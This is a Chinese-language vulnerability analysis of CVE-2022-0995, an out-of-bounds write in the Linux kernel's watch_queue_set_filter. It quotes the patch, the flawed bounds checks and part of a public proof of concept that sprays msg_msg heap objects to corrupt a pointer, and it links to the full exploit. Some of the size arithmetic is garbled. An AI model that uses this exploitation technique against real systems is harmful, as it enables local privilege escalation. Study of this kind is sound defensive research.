网安 - 专业的网络安全产业、社区、知识平台

CVE-2022-0995分析(内核越界 watch_queue_set_filter)

VSole2022-04-20 16:31:40

漏洞成因

此漏洞与CVE-2021-22555(https://blog.csdn.net/bme314/article/details/123841867?spm=1001.2014.3001.5502)利用方式相似。

@@ -320,7 +319,7 @@ long watch_queue_set_filter(struct pipe_inode_info *pipe,             tf[i].info_mask & WATCH_INFO_LENGTH)             goto err_filter;         /* Ignore any unknown types */-        if (tf[i].type >= sizeof(wfilter->type_filter) * 8)+        if (tf[i].type >= WATCH_TYPE__NR)             continue;         nr_filter++;     }@@ -336,7 +335,7 @@ long watch_queue_set_filter(struct pipe_inode_info *pipe,      q = wfilter->filters;     for (i = 0; i < filter.nr_filters; i++) {-        if (tf[i].type >= sizeof(wfilter->type_filter) * BITS_PER_LONG)+        if (tf[i].type >= WATCH_TYPE__NR)             continue;          q->type            = tf[i].type;@@ -371,6 +370,7 @@ static void __put_watch_queue(struct kref *kref)      for (i = 0; i < wqueue->nr_pages; i++)         __free_page(wqueue->notes[i]);+    bitmap_free(wqueue->notes_bitmap);      wfilter = rcu_access_pointer(wqueue->filter);     if (wfilter)@@ -566,7 +566,7 @@ void watch_queue_clear(struct watch_queue *wqueue)     rcu_read_lock();     spin_lock_bh(&wqueue->lock); -    /* Prevent new additions and prevent notifications from happening */+    /* Prevent new notifications from being stored. */     wqueue->defunct = true;      while (!hlist_empty(&wqueue->watches)) {

根据补丁位置,大致可以看到watch_queue_set_filter此位置很有可能是溢出点。

for (i = 0; i < filter.nr_filters; i++) {    if ((tf[i].info_filter & ~tf[i].info_mask) ||        tf[i].info_mask & WATCH_INFO_LENGTH)        goto err_filter;    /* Ignore any unknown types */    if (tf[i].type >= sizeof(wfilter->type_filter) * 8)        continue;    nr_filter++;} /* Now we need to build the internal filter from only the relevant * user-specified filters. */ret = -ENOMEM;wfilter = kzalloc(struct_size(wfilter, filters, nr_filter), GFP_KERNEL);if (!wfilter)    goto err_filter;wfilter->nr_filters = nr_filter; q = wfilter->filters;for (i = 0; i < filter.nr_filters; i++) {    if (tf[i].type >= sizeof(wfilter->type_filter) * BITS_PER_LONG)        continue;     q->type            = tf[i].type;    q->info_filter        = tf[i].info_filter;    q->info_mask        = tf[i].info_mask;    q->subtype_filter[0]    = tf[i].subtype_filter[0];    __set_bit(q->type, wfilter->type_filter);    q++;}

查看相关代码,分配的watch_type_filter数量nr_filter为 tf[i].type < sizeof(wfilter->type_filter) 8

而访问q = wfilter->filters; 则是 tf[i].type >= sizeof(wfilter->type_filter) BITS_PER_LONG。

sizeof(wfilter->type_filter) BITS_PER_LONG > sizeof(wfilter->type_filter) 8

所以这里因该是会造成访问越界地址的问题。只要 sizeof(wfilter->type_filter) BITS_PER_LONG > tf[i].type > sizeof(wfilter->type_filter) 8。

long watch_queue_set_filter(struct pipe_inode_info *pipe,                struct watch_notification_filter __user *_filter){      ...    tf = memdup_user(_filter->filters, filter.nr_filters * sizeof(*tf));...}

根据poc

do {   ntries++;    filter->nr_filters = nfilters;   for (int i = 0; i < (nfilters - 1); i++) {  // choose kmalloc-96     filter->filters[i].type = 1;   }    // Set 1 bit oob to 1, hopefully we overwrite a msg_msg.mlist.next which is not 2k aligned   filter->filters[nfilters - 1].type = 0x30a; // 0x300 -> 96 bytes oob, 0xa -> 2**10 == 1024    if (pipe2(fds, O_NOTIFICATION_PIPE) == -1) {     perror("pipe2()");     exit(1);   }    // Spray kmalloc-96   spray_msgmsg();   delete_msgmsg(MSGMSG_FREE_IDX_1, PRIMARY_SIZE, MTYPE_PRIMARY); // kmalloc   delete_msgmsg(MSGMSG_FREE_IDX_0, PRIMARY_SIZE, MTYPE_PRIMARY); // memdup    // Filter go   if (ioctl(fds[0], IOC_WATCH_QUEUE_SET_FILTER, filter) < 0) {     perror("ioctl(IOC_WATCH_QUEUE_SET_FILTER)");     goto err;   }    check_corruption();    if (corrupted_idx != -1)     break;    cleanup_msgmsg(); } while (ntries < CORRUPT_MSGMSG_TRIES);

可以看到struct watch_notification_filter 是直接从用户态传进来的。sizeof(wfilter->type_filter) BITS_PER_LONG = 1664 = 1024, sizeof(wfilter->type_filter) 8 = 168 = 128;0x30a = 778;

struct callback_head {    struct callback_head *next;    void (*func)(struct callback_head *head);} __attribute__((aligned(sizeof(void *))));#define rcu_head callback_head

struct watch_type_filter 占 16 个字节。

poc中nfilters=4, type=778的有占其中一个。其余type=1。

也就是内核分配了 16 + 4 + 4 5 3 = 80 而可以访问的范围确实 16 + 4 + 4 5 4 = 100。

越界的大小为 100 - 80 = 20。

poc 里堆喷了2000*96字节的堆。释放1950和0位置上的msg。重复50次堆喷。大致又是这样。

struct msg_msg {    struct list_head m_list;    long m_type;    size_t m_ts;        /* message text size */    struct msg_msgseg *next;    void *security;    /* the actual message follows immediately */}; // https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/linux/types.hstruct list_head {    struct list_head *next, *prev;}; // https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/ipc/msgutil.cstruct msg_msgseg {    struct msg_msgseg *next;    /* the next part of the message follows immediately */};

msg_msg = 8*2 + 8 + 8 + 8 + 8 = 48 = 0x30。

static struct msg_msg *alloc_msg(size_t len){    struct msg_msg *msg;    struct msg_msgseg **pseg;    size_t alen;     alen = min(len, DATALEN_MSG);  //4048    msg = kmalloc(sizeof(*msg) + alen, GFP_KERNEL_ACCOUNT);    if (msg == NULL)        return NULL;     msg->next = NULL;    msg->security = NULL;     len -= alen;    pseg = &msg->next;    while (len > 0) {        struct msg_msgseg *seg;         cond_resched();         alen = min(len, DATALEN_SEG);        seg = kmalloc(sizeof(*seg) + alen, GFP_KERNEL_ACCOUNT);        if (seg == NULL)            goto out_err;        *pseg = seg;        seg->next = NULL;        pseg = &seg->next;        len -= alen;    }     return msg; out_err:    free_msg(msg);    return NULL;}

也就是primary_msg的next的后四个字节将会被写成零。这样将造成与CVE-2021-22555利用过程翻译(https://blog.csdn.net/bme314/article/details/123841867?spm=1001.2014.3001.5501)相同的情况。

利用方式

这个在cve-2021-22555中有详细的解释,不说了。

poc https://github.com/Bonfee/CVE-2022-0995

sizeof
本作品采用《CC 协议》,转载必须注明作者和本文链接
Windows 之 CRT的检测内存泄露
2023-07-21 09:58:54
相关例子如下,编译的时候需要在Debug模式:#define _CRTDBG_MAP_ALLOC. main.cpp : {163} normal block at 0x000002882AE17740, 12 bytes long.Data: < M > 07 00 00 00 4D 00 00 00 09 03 00 00. main.cpp : {162} normal block at 0x000002882AE148C0, 4 bytes long.内存的申请在C++编程语言中,内存申请对应的关键字是new或malloc,其实new最后调用的也是malloc函数,对应源代码文件是debug_heap.cpp。在包含相关头文件之后,malloc函数的调用栈为:malloc -> _malloc_dbg -> heap_alloc_dbg -> heap_alloc_dbg_internal。_CrtMemBlockHeader* _block_header_prev; // 双向链表,访问该双向链表的全局变量为__acrt_first_block. size_t _data_size; // malloc分配的大
syscall的检测与绕过
2023-01-05 09:43:15
syscall的检测与绕过
记一次新型变种QakBot木马分析
2022-04-30 16:46:17
不出意料恢复主线程执行后桌面程序会加载dll。使用IDA分析:大体不算太复杂的调用关系,但是函数较多:还有一些乱七八糟的函数比较多,主要看看大概做了哪些事情,获取操作系统版本\名称\系统目录等信息。
CVE-2022-0995分析(内核越界 watch_queue_set_filter)
2022-04-20 16:31:40
此漏洞与CVE-2021-22555(https://blog.csdn.net/bme314/article/details/123841867?spm=1001.2014.3001.5502)利用方式相似。
Windows内核-句柄
2022-04-16 16:06:49
进程的地址空间分为系统空间和用户空间,内核对象都保存在系统空间中,用户空间不能通过地址作为指针来引用它们,Windows使用句柄(handle)来对内核对象进行引用。看起来很小,但是涉及的内容很多。
逆向角度看C++部分特性
2022-04-02 16:26:28
逆向角度看C++部分特性
植物大战僵尸修改器制作--从入门到入土
2023-08-18 09:35:43
1.CheatEngine工具的基本使用
Kernel-Pwn-FGKASLR
2023-07-10 10:24:04
是KASLR的加强版,增加了更细粒度的地址随机化
在ShellCode里面使用异常处理(Win64位平台)
2023-06-21 11:19:17
网上关于ShellCode编写的文章很多,但介绍如何在ShellCode里面使用异常处理的却很少。Windows程序的异常处理,其实是三者结合的:操作系统、编译器和程序代码。因为x86下异常处理的文章太多,所以本文只介绍Win64下的。而Win64的异常处理,是基于表的。也就是说,编译器在编译代码的时候,会同时对每个函数生成一个异常表,最后链接到PE的异常表里。相对来说,这个比X86更加安全和高效。
通过隐藏导入表的方式规避杀软
2023-05-29 09:34:57
前言在PE文件中,存在iat导入表,记录了PE文件使用的API以及相关的dll模块。可以看到使用了MessageBox这个API杀软会对导入表进行查杀,如果发现存在恶意的API,比如VirtualAlloc,CreateThread等,就会认为文件是一个恶意文件。自定义API函数FARPROC GetProcAddress;定义:typedef int ();HMODULE LoadLibraryA; // 成功返回句柄 失败返回NULL. 这里GetModuleHandle和LoadLibrary作用是一样的,获取dll文件。HWND hWnd, LPCTSTR lpText, LPCTSTR lpCaption, UINT uType );printf; pMessageBox MyMessageBox = GetProcAddress; MyMessageBox; return 0;}. 程序可以正常运行:查看其导入表:User32.dll和MessageBox都不存在。实战测试用创建进程的方式加载shellcode。
VSole
网络安全专家